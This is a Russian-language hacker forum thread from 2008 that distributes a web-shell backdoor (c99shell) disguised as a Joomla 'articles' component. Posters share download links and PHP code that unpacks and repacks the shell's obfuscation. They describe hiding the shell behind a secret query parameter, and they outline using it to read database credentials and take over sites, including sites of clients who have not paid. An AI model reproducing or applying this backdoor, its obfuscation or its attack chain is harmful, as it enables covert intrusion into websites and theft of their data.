[Наши релизы] Шелл - компонент для Жумлы

Тема в разделе "Скрипты", создана пользователем Raenor, 11 фев 2008.

Информация :
Уважаемые пользователи если Вы ищите скрипт, то создайте тему в соответствующем разделе "Коммерческие" или "OpenSource"
В данном разделе создавать темы с префиксом"ИЩУ" запрещено.
Статус темы:
Закрыта.
Модераторы: DMS
  1. Raenor

    Raenor Ксенолог №1

    Регистр.:
    28 дек 2006
    Сообщения:
    156
    Симпатии:
    91
    c99shell модифицированый и зазенденый
    устанавливается в жумлу как компонент из админки
    в админке следов нет и удалить из админки нельзя

    на всякий случай назван типа под "статьи"
    запускать: /components/com_articles/articles.php

    http://rapidshare.com/files/90966946/com_articles.zip.html
     
    asas, dragonstyle, kinho и 5 другим нравится это.
  2. bigbrain

    bigbrain

    Регистр.:
    5 окт 2006
    Сообщения:
    689
    Симпатии:
    84
    А можно узнать, что позволяет делать этот компонент?
     
  3. Zeratul

    Zeratul Создатель

    Регистр.:
    17 мар 2006
    Сообщения:
    1.322
    Симпатии:
    3.855
    Почитай на хак-форумах что такое шелл..:-]
    Он позволяет оставлять себе бек дор в сайте к админке которого есть доступ.
     
  4. Kai

    Kai

    Регистр.:
    29 июн 2007
    Сообщения:
    329
    Симпатии:
    46
    Не под зендом он, а в родной запаковке.
    Кстати кому интересно, могут его распаковать так (к примеру для изменения способа запаковки или изменения констант)

    Распаковываем
    Код:
    <?PHP
    if ($fh = fopen('c99madshell.php', 'r')) { //грузим шелл. всё кроме eval(*(*(*))); - УБРАТЬ!
        $b = fread($fh, 1111111);// выделяем максмальный размер буфера
        fclose($fh);
    }
    
    
    $a=1;
    while ( $a <= $_GET['n'] ) {
    $b = str_replace("<?","",$b);
    $b = str_replace("?>","",$b);
    $b = str_replace(" ","",$b);
    $b = str_replace("eval(gzinflate(base64_decode('","'",$b);
    $b = str_replace("')));","'",$b);
    
    $b = gzinflate(base64_decode($b));   // Расшифруем. $_GET['n'] - кол-во раз сжатия. у родного шела = 11
    
    $a=$a+1;
    }
    
    echo $b;  // вывод на экран
    
    if ($fh = fopen('c99_decode.php', 'w')) {  // вывод в файл для теста
        fwrite($fh, "<? ".$b." ?>");
        fclose($fh);
    }
    ?>
    Запаковываем
    Код:
    <?PHP
    if ($fh = fopen('c99_no_cript.php', 'r')) { грузим расшифрованный шелл
        $b = fread($fh, 1111111);// выделяем максмальный размер буфера
        fclose($fh);
    }
    
    
    $a=1;
    while ( $a <= $_GET['n'] ) { 
    $b = base64_encode(gzdeflate($b));        // Шифруем. $_GET['n'] - кол-во раз сжатия. у родного шела = 11
    $b = "eval(gzinflate(base64_decode('".$b;
    $b = $b."')));";
    
    
    $a=$a+1;
    }
    
    echo $b;  // вывод на экран
    
    if ($fh = fopen('test_c99.php', 'w')) {  // вывод в файл для теста
        fwrite($fh, "<? ".$b." ?>");
        fclose($fh);
    }
    ?>
    Я тут немного переделал этот компонент, для меньшей палевности, а то так юзер мог к примеру наткнувшыcь на непонятный article.php, запустить его с браузера, и увидеть шелл. Теперь этого не будет, так components/com_articles/articles.php он не заведется )))

    Шелл будет доступен по адресу:
    /components/com_articles/articles.php?module=joomla

    http://rapidshare.com/files/92229141/com_articles.zip.html
     
    scarm, igorus22, vornic и ещё 1-му нравится это.
  5. madcap

    madcap Постоялец

    Заблокирован
    Регистр.:
    17 сен 2006
    Сообщения:
    147
    Симпатии:
    26
    ИМХО - бесполезная весчица для тех, у кого OpenSEF стоит, и кто в него хоть изредко заглядывает.
    Ибо там в статистике остаются адреса сайта по которым были заходы.
    Хоть этот компонент не для сбора статистики, а для переписывания URL-адресов к человекообразному виду, тем не менее - все адреса которые пытались открыть на моём сайте (и роботы и люди) - всё остаётся. И чего только у Мну на сайте не искали... и форумы и доски, и есчо кучу всего, чего там никогда небыло.

    Поэтому как ни колдуйте с новым компонентом Joom-C99 - ничем его не замаскировать, если админ все файлы джумлы знает, и заходит в админку хотябы время от времени.
     
  6. Kai

    Kai

    Регистр.:
    29 июн 2007
    Сообщения:
    329
    Симпатии:
    46
    madcap, мне кажется ты плохо понимаешь смысл данного компонента ...

    Это способ заливки шелла на сайт с джумлой. Именно способ! Мне честно говоря лень разбираться с компонентом OpenSEF.
    Но у меня впечатление такое, что он может максимум, смотреть обращение к страницам, которые известны джумле самой, а уж никак не к стороннему скрипту. Только если он логи апача смотрит, что на самом деле для хостинга не возможно, а все остальное треш!

    Ну это даже мелочи ... теперь к пониманию компонента. Он позволяет иметь шелл с правами хорошими.
    Теперь по поводу бдительности админа.

    Если он такой, он не допустит ухода акка, пусть даже не гл. админа, это не важно. Но и это не беда, упустил. Далее что? Льем шелл --> Смотрим конфиг к мускулу --> Имеем доступ к бд --> При желании админ уже не админ

    Вот и все собственно. Шелл на таких сайтах НЕ нужен для постоянного использования, здесь либо сливать, либо вставлять что нужно.
     
  7. xdav

    xdav

    Регистр.:
    14 ноя 2007
    Сообщения:
    170
    Симпатии:
    21
    Плиз можете перекачать на другой обменник(кроме депозитфайлс) например на ифолдер. (вед файлик не болшой)
    на рапиде у меня всегда "Your IP-address ***.*** is already downloading a file. "
    Думаю у моего провайдера толко 1 ип и всех через него пускают. (Ползуюс диал-апом)
     
  8. Kai

    Kai

    Регистр.:
    29 июн 2007
    Сообщения:
    329
    Симпатии:
    46
    http://ifolder.ru/5409459
    Держи)
     
    xdav нравится это.
  9. DOKTOR_666

    DOKTOR_666

    Регистр.:
    14 июн 2006
    Сообщения:
    532
    Симпатии:
    239
    Да компонент просто супер
    особенно в ситуации когда написал заказчику сайты а тебе за него платить не очень-то хотят ..... и пароли сменили
     
  10. ziv

    ziv Постоялец

    Регистр.:
    5 дек 2006
    Сообщения:
    106
    Симпатии:
    5
    Можно наверное и в другой двиг внедрить?
     
Статус темы:
Закрыта.